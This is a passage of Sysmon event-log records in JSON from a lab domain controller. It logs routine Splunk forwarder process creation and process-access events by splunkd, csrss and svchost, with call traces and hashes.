{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8505,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.821\r\nProcessGuid: {41C8662E-22D1-5F25-0000-00109DB21100}\r\nProcessId: 4976\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.821","ProcessGuid":"{41C8662E-22D1-5F25-0000-00109DB21100}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8506,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.818\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-22D1-5F25-0000-00109DB21100}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.818","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-22D1-5F25-0000-00109DB21100}","TargetProcessId":"4976","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8507,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.818\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22D1-5F25-0000-00109DB21100}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.818","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22D1-5F25-0000-00109DB21100}","TargetProcessId":"4976","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8508,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.818\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.818","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8509,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.818\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.818","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8510,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.818\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.818","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8511,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.818\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.818","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8512,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.818\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:45.818","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8513,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:45.818\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 